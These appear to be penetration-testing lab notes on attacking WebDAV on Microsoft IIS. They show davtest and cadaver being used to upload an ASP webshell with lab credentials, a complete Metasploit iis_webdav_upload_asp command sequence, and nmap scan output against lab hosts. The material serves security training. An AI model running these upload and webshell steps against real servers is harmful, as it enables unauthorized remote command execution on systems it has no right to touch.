WebDAV and IIS Exploitation

WebDAV and IIS Exploitation

Navigation

Sections in This Note


WebDAV

WebDAV (Web-based Distributed Authoring and Versioning) is a set of extensions to the HTTP protocol which allows users to collaboratively edit and manage files on remote web servers.

The first step of the exploitation process is identifying whether WebDAV has been configured to run on the IIS web server. Then perform a brute-force attack on the WebDAV server to identify credentials.

After obtaining credentials, we can authenticate with the WebDAV server and upload a malicious .asp payload that can be used to execute arbitrary commands or obtain a reverse shell on the target.


Migrated from Unsorted Notes — Frequently Exploited Windows Services

Frequently Exploited Windows Services

Protocol/Service Ports Purpose
Microsoft IIS (Internet Information Services) TCP 80/443 Proprietary web server developed by Microsoft that runs on Windows
WebDAV (Web Distributed Authoring & Versioning) TCP 80/443 HTTP extension allowing clients to update, delete, move, and copy files on a web server; used to enable a web server to act as a file server
SMB/CIFS (Server Message Block) TCP 445 Network file sharing protocol used to facilitate sharing of files and peripherals between computers on a LAN
RDP (Remote Desktop Protocol) TCP 3389 Proprietary GUI remote access protocol developed by Microsoft, used to remotely authenticate and interact with a Windows system
WinRM (Windows Remote Management Protocol) TCP 5985/5986 Windows remote management protocol used to facilitate remote access

Migrated from Unsorted Notes — Tools Used

Tools Used


Migrated from Unsorted Notes — Using davtest for Scanning

Using davtest for Scanning

Command: davtest -auth bob:password_123321 -url http://10.0.16.177/webdav
root@attackdefense:~# davtest -auth bob:password_123321 -url http://10.0.16.177/webdav
********************************************************
Testing DAV connection
OPEN            SUCCEED:                http://10.0.16.177/webdav
********************************************************
NOTE    Random string for this session: 1CwBZI4vZ
********************************************************
Creating directory
MKCOL           SUCCEED:                Created http://10.0.16.177/webdav/DavTestDir_1CwBZI4vZ
********************************************************
Sending test files
PUT     asp     SUCCEED:        http://10.0.16.177/webdav/DavTestDir_1CwBZI4vZ/davtest_1CwBZI4vZ.asp
PUT     jhtml   SUCCEED:        http://10.0.16.177/webdav/DavTestDir_1CwBZI4vZ/davtest_1CwBZI4vZ.jhtml
PUT     pl      SUCCEED:        http://10.0.16.177/webdav/DavTestDir_1CwBZI4vZ/davtest_1CwBZI4vZ.pl
PUT     txt     SUCCEED:        http://10.0.16.177/webdav/DavTestDir_1CwBZI4vZ/davtest_1CwBZI4vZ.txt
PUT     cgi     SUCCEED:        http://10.0.16.177/webdav/DavTestDir_1CwBZI4vZ/davtest_1CwBZI4vZ.cgi
PUT     cfm     SUCCEED:        http://10.0.16.177/webdav/DavTestDir_1CwBZI4vZ/davtest_1CwBZI4vZ.cfm
PUT     shtml   SUCCEED:        http://10.0.16.177/webdav/DavTestDir_1CwBZI4vZ/davtest_1CwBZI4vZ.shtml
PUT     jsp     SUCCEED:        http://10.0.16.177/webdav/DavTestDir_1CwBZI4vZ/davtest_1CwBZI4vZ.jsp
PUT     aspx    SUCCEED:        http://10.0.16.177/webdav/DavTestDir_1CwBZI4vZ/davtest_1CwBZI4vZ.aspx
PUT     php     SUCCEED:        http://10.0.16.177/webdav/DavTestDir_1CwBZI4vZ/davtest_1CwBZI4vZ.php
PUT     html    SUCCEED:        http://10.0.16.177/webdav/DavTestDir_1CwBZI4vZ/davtest_1CwBZI4vZ.html

Migrated from Unsorted Notes — Using cadaver to Upload the .asp Exploit File

Using cadaver to Upload the .asp Exploit File

root@attackdefense:~# cadaver http://10.0.16.177/webdav
Authentication required for 10.0.16.177 on server `10.0.16.177':
Username: bob
Password:
dav:/webdav/> ls
Listing collection `/webdav/': succeeded.
Coll:   DavTestDir_1CwBZI4vZ                       0  Jan  7 17:37
        AttackDefense.txt                          13  Jan  2 18:23
        web.config                                168  Jan  2 18:23
dav:/webdav/>

Uploading webshell.asp (stored by default at /usr/share/webshells/asp/webshell.asp):

Command: put /usr/share/webshells/asp/webshell.asp
ls
dav:/webdav/> put /usr/share/webshells/asp/webshell.asp
Uploading /usr/share/webshells/asp/webshell.asp to `/webdav/webshell.asp':
Progress: [=============================>] 100.0% of 1362 bytes succeeded.
dav:/webdav/> ls
Listing collection `/webdav/': succeeded.
Coll:   DavTestDir_1CwBZI4vZ                       0  Jan  7 17:37
        AttackDefense.txt                          13  Jan  2 18:23
        web.config                                168  Jan  2 18:23
        webshell.asp                             1362  Jan  7 17:55
dav:/webdav/>

Migrated from Unsorted Notes — Uploading Exploit File Using Metasploit

Uploading Exploit File Using Metasploit

Command: davtest -auth bob:password_123321 -url http://10.0.17.27/webdav

Running Metasploit and exploiting the target using the IIS WebDAV exploit module:

Commands:
msfconsole -q
use exploit/windows/iis/iis_webdav_upload_asp
set RHOSTS 10.0.17.27
set HttpUsername bob
set HttpPassword password_123321
set PATH /webdav/metasploit%RAND%.asp
exploit


Migrated from Unsorted Notes — Port Scanning and Enumeration

Port Scanning and Enumeration

Identify the target IP address:

cat /etc/hosts

Port scanning with Nmap:

nmap -sV 10.0.22.85
Host is up (0.0035s latency).
Not shown: 983 closed tcp ports (reset)
PORT      STATE SERVICE           VERSION
21/tcp    open  ftp               Microsoft ftpd
22/tcp    open  ssh               OpenSSH 7.1 (protocol 2.0)
80/tcp    open  http              Microsoft IIS httpd 7.5
135/tcp   open  msrpc             Microsoft Windows RPC
139/tcp   open  netbios-ssn       Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds      Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3306/tcp  open  mysql             MySQL 5.5.20-log
3389/tcp  open  tcpwrapped
4848/tcp  open  ssl/http          Oracle Glassfish Application Server
7676/tcp  open  java-message-service  Java Message Service 301
8080/tcp  open  http              Sun GlassFish Open Source Edition 4.0
8181/tcp  open  ssl/http          Oracle GlassFish 4.0 (Servlet 3.1; JSP 2.3; Java 1.8)
9200/tcp  open  wap-wsp?
49152/tcp open  msrpc             Microsoft Windows RPC
49153/tcp open  msrpc             Microsoft Windows RPC
49154/tcp open  msrpc             Microsoft Windows RPC
49158/tcp open  msrpc             Microsoft Windows RPC

Nmap script scan on 10000 ports for additional info:

nmap -T4 -Pn -sC -sV -p 1-10000 10.0.22.85
Powered by Forestry.md